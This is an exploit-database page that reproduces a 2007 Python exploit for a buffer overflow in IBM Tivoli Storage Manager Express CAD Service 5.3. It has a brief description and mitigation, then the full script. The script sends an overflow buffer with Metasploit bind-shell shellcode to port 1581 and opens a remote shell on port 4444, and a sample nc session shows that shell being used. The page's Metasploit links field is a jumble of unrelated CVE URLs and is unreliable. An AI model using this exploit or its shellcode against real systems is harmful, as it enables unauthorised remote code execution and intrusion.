header-logo
Suggest Exploit
vendor:
IBM Tivoli Storage Manager Express CAD Service
by:
Mati Aharoni
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: IBM Tivoli Storage Manager Express CAD Service
Affected Version From: 5.3
Affected Version To: 5.3
Patch Exists: NO
Related CWE: CVE not mentioned
CPE: a:ibm:tivoli_storage_manager_express_cad_service:5.3
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-23499/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2022-3172/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/debian-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-25686/https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=3https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2
Other Scripts:
Platforms Tested: Windows 2003 server SP0
Unknown

IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)

This exploit allows an attacker to execute arbitrary code on a target system by sending a specially crafted buffer to the IBM Tivoli Storage Manager Express CAD Service. The buffer overflow vulnerability exists in version 5.3 of the software. The exploit code provided in the script connects to a target host and sends the malicious buffer. If successful, it opens a bindshell on port 4444 for the attacker to gain remote access to the system. The script was tested on a Windows 2003 server SP0.

Mitigation:

Upgrade to a patched version of IBM Tivoli Storage Manager Express CAD Service.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0. 
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# E:\Program Files\Tivoli\TSM\baclient>

import socket
import sys

print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
print "[*] http://www.offensive-security.com"

def usage():
	print "[*] Usage: ./dsmcad.py <host>"
	sys.exit(1)

if len(sys.argv) != 2:
	usage()

buffer="BirdsflyinghighyouknowhowIfeel"
buffer+="SunintheskyyouknowhowIfeel"
buffer+="ReeedsdriftinonbyyouknowhowIfeel"
buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"

buffer+="\x38\x07\xD2\x77"	#77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
buffer+="\x90"*4
buffer+=(
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31"
"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33"
"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c"
"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65"
"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75"
"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c"
"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b"
"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a"
"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64"
"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66"
"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57"
"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54"
"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73"
"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b"
"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63"
"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58"
"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f"
"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73"
"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e"
"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42"
"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71"
"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41"
"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62"
"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c"
"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49"
"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b"
"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e"
"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a"
"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72"
"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76"
"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37"
"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30"
"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e"
"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30"
"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76"
"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68"
"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e"
"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46"
"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b"
"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b"
"\x4f\x48\x56\x49\x6f\x48\x50\x61")
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[*] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 1581 ) )
print "[*] Sending evil buffer, ph33r"
expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n')
expl.close()
print "[*] Check port 4444 for bindshell"

# milw0rm.com [2007-10-27]

Navigation

Suggest Exploit

Services By CQR